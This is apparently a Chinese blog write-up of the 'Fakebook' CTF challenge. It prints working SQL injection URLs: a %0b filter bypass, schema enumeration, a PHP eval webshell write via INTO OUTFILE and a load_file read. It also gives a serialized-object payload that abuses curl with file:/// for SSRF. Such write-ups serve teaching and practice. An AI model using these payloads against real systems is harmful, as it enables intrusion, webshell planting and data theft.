[⽹鼎杯 2018]Fakebook

原创 已于 2023-11-30 18:10:42 修改 · 875 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #web安全

于 2023-11-30 18:08:32 首次发布
文章描述了一次SQL注入攻击的过程,攻击者尝试通过%0b字符绕过过滤并探索数据库结构,最终利用SSRF获取文件内容。涉及的库有fakebook、information_schema等,展示了如何构造payload来获取Webshell并利用file:///功能进行数据读取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

注册到这个地⽅的时候:

有⼀个no可以被注⼊的样⼦。

试了⼀下,有报错:        

开始sql各种测试:

过滤字符:select 但是通过%0bselect直接绕过了。于是开始⾛流程。

http://7d69ac77-5c96-4077-95ed-8899a08d4d97.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,database(), '23','www'%23

http://7d69ac77-5c96-4077-95ed-8899a08d4d97.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,group_concat(table_name),3,3 from information_schema.tables where table_schema=database() %23

http://7d69ac77-5c96-4077-95ed-8899a08d4d97.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,group_concat(column_name),3,3 from information_schema. columns where table_schema=database() %23

http://7d69ac77-5c96-4077-95ed-8899a08d4d97.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,group_concat(schema_name),3,5 from information_schema.schemata;%23。 查看所有数据库

⼀共有:fakebook,information_schema,mysql,performance_schema,test 这些库

http://7d69ac77-5c96-4077-95ed-8899a08d4d97.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,group_concat(column_name),3,3 from information_schema. columns where 

table_schema='performance_schema' %23

http://4ce8295f-7978-40b0-bb2b-4bf4ae39fbbb.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,group_concat(column_name),3,3 from information_schema.columns where 

table_schema='performance_schema' and table_name='accounts' %23

http://4ce8295f-7978-40b0-bb2b-4bf4ae39fbbb.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,group_concat(table_name),3,3 from information_schema.tables where 

table_schema='performance_schema' %23

http://a8806d55-b07c-4a33-a3e9-e457184ee50a.node4.buuoj.cn:81/view.php?no=3 union %0bselect 1,"<?

php @eval($_GET['cmd'])?>",2,3 into outfile '/var/www/html/falg.php' %23

写不了webshell,那就直接读:

http://a8806d55-b07c-4a33-a3e9-e457184ee50a.node4.buuoj.cn:81/view.php?no=3 union %0bselect 

1,load_file('/var/www/html/flag.php'),3,4 %23

第⼆解法:利⽤ssrf。file://函数。下⾯部分的代码,可以直接被利⽤。

        

http://a87885e6-121d-453b-adf0-d7e3230fc5ec.node4.buuoj.cn:81/view.php?no=3 union %0bselect 
1,group_concat(data),3,3 from users where no=1 %23
我们之前在join那⼉新增的数据,它会把序列化后的内容加⼊到data字段。因此我们只需要构造⼀个序列化好的
字符串就⾏

利⽤file:///var/www/html/flag.php,就能获取了,因
为它⽤了curl函数。
http://f9a117d6-eb11-4844-
acc4-4b6e1289d453.node4.buuoj.cn:81/view.php?
no=3 union %0bselect 1,2222,3,
'O:8:%22UserInfo%22:3:%7Bs:4:%22name%22;s:2:%2211%22;s:3:%22age%22;i:11;s:4:%22blog%22;s:29:
%22file:///var/www/html/flag.php%22;%7D' %23

解密即可

 

WHU_Joe.
关注
安全 | CTF】fakebook2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
[ 2018]Fakebook
qq_43622442的博客
04-20 4340
[ 2018]Fakebook 1.打开站,就两个功能点 2.先打开join看一下,注册页面,随便输入,注册一下: 3.发现登陆进来了:(这里有个坑,注册完了之后就不能回退,去测试之前的login页面了,不过可以直接输入login.php回去测试) 4.发现dawn是个url,点击看一下:(这里我也傻了,我一开始傻里傻气的在username插了个xss,结果没看到这个超链接,在源代码...
BUUCTF——[ 2018]Fakebook
m_de_g的博客
04-24 1526
【代码】BUUCTF——[ 2018]Fakebook
[ 2018]Fakebook 1
bazzza的博客
12-20 1286
先注册一个账号看看,发现对blog有过滤,注册完登录进去发现界面是这样的, 可以看到页面下方打开了我们注册的blog,可以大胆的推测他可以进行ssrf,但是blog在注册时是经过过滤的,只能是固定的格式,看起来是难以利用的。 然后,我看别人的wp,对目录扫描后可直接扫描出来robots.txt和flag.php,我自己也扫了一下, https://blog.youkuaiyun.com/weixin_43940853/article/details/105081522 ...
buuctf-[ 2018]Fakebook
qq_42728977的博客
12-17 1249
[ 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
[ 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1863
[ 2018]Fakebook 解题思路&过程
BUUCTF-[ 2018]Fakebook
qq_43006864的博客
04-20 1848
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
[ 2018]Fakebook——SSRF/反序列化漏洞/SQL注入
sGanYu
09-29 4329
解法一 解法二 解法三 考点 • 目录扫描 • SSRF • SQL注入 • PHP反序列化 前言:当我们拿到站的时候,首先需要对这个站进行信息收集,扩大漏洞发现的概率,比如whois、指纹识别、扫描目标站点的目录,寻找敏感信息、后台又或者是否存在备份文件,其实靶场也一样,如果觉得麻烦,也可能错过发现一个可利用的漏洞 开始之前,先扫描一下该站下目录,查看有什么敏感信息泄露 直接扫出了flag.php文件,有是有,但是访问后,回显内容为空,当我们确定了一个
fakebook
最新发布
03-25
好的,用户提到Fakebook,看起来可能与CTF题目有关,特别是2018的题目。用户引用了多个涉及SQL注入、PHP反序列化和SSRF的内容。首先,我需要整理这些引用中的关键点。 首先,引用[2]和[3]指出存在SQL注入点,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值